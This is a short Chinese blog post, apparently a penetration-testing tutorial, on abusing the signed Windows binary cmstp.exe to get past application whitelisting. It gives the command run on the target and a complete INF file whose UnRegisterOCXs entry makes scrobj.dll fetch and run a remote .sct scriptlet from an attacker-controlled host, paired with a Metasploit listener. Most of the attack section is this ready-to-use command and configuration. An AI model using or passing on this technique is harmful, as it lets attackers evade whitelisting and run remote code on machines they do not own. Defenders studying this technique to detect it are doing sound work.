渗透测试-基于白名单执行payload--Cmstp

渗透测试-基于白名单执行payload--Cmstp

0x01 Cmstp简介

Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。

微软官方文档:

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

说明:Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别,需注意x86,x64位的Cmstp调用。

Windows 2003 默认位置:

C:\Windows\System32\cmstp.exe

C:\Windows\SysWOW64\cmstp.exe

 

Windows 7 默认位置:

C:\Windows\System32\cmstp.exe

C:\Windows\SysWOW64\cmstp.exe

渗透测试-基于白名单执行payload--Cmstp_第1张图片

 

 

0x02 复现

 

攻击机: Kali

靶机:Win 7

 

Msf配置:

渗透测试-基于白名单执行payload--Cmstp_第2张图片

靶机执行:

cmstp.exe /ni /s C:\Users\John\Desktop\rev.inf

 

Micropoor_rev_cmstp_inf:

[version]

 

Signature=$chicago$

 

AdvancedINF=2.5

 

[DefaultInstall_SingleUser]

 

UnRegisterOCXs=UnRegisterOCXSection

 

[UnRegisterOCXSection]

 

%11%\scrobj.dll,NI,http://192.168.1.4/cmstp_rev_53_x64.sct

 

[Strings]

 

AppAct = "SOFTWARE\Microsoft\Connection Manager"

 

ServiceName="Micropoor"

 

ShortSvcName="Micropoor"

 

 

 

 

 

 

cmstp_rev_53_x64.sct







 





 

posted @ 2019-05-03 21:29 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,权限提升,Web渗透)